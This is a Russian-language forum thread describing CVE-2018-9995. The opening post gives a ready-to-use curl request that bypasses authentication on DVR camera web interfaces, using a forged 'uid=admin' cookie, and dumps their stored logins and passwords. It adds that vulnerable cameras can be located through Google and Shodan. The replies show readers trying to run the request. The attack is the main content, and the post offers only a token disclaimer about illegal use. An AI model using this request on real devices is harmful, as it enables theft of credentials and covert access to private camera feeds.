Статья CVE-2018-9995 или как получить логин и пароль к DVR камере

Приветствую, форумчане. Не так давно была обнаружена , затрагивающая довольно большое количество камер.
Брешь позволяет одним запросом вытащить логины и пароли к веб интерфейсу DVR устройства, откуда, кстати, можно смотреть трансляцию/запись камеры, менять настройки и всё в этом духе.

Собственно запрос
Код:
curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
1525374909606.png


Камеры неплохо "гуглятся" и находятся в шодане.
1525374164240.png


1525374381482.png

Не советую использовать всё это дело в незаконных целях (я должен был это сказать), по крайней мере потому, что подглядывать не хорошо;)
На гите автора есть эксплоит на питоне (хотя по мне проще написать свой)
 

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Я так понимаю uid это логин, но как тогда узнать uid если он по стандарту не admin ?
 
06.08.2020
1
0
BIT
0
Куда вставлять этот код ? Если в cmd.exe - выдает
HTML:
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>404 Not Found</H4>
File not found.
<HR>
<ADDRESS><A HREF="[URL='http://www.acme.com/software/mini_httpd/']mini_httpd[/URL]">mini_httpd/1.19 19de
c2003</A></ADDRESS>
</BODY>
</HTML>
Если в python - выдает
SyntaxError: invalid syntax

...Program finished with exit code 1

Press ENTER to exit console.
 
Последнее редактирование модератором:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!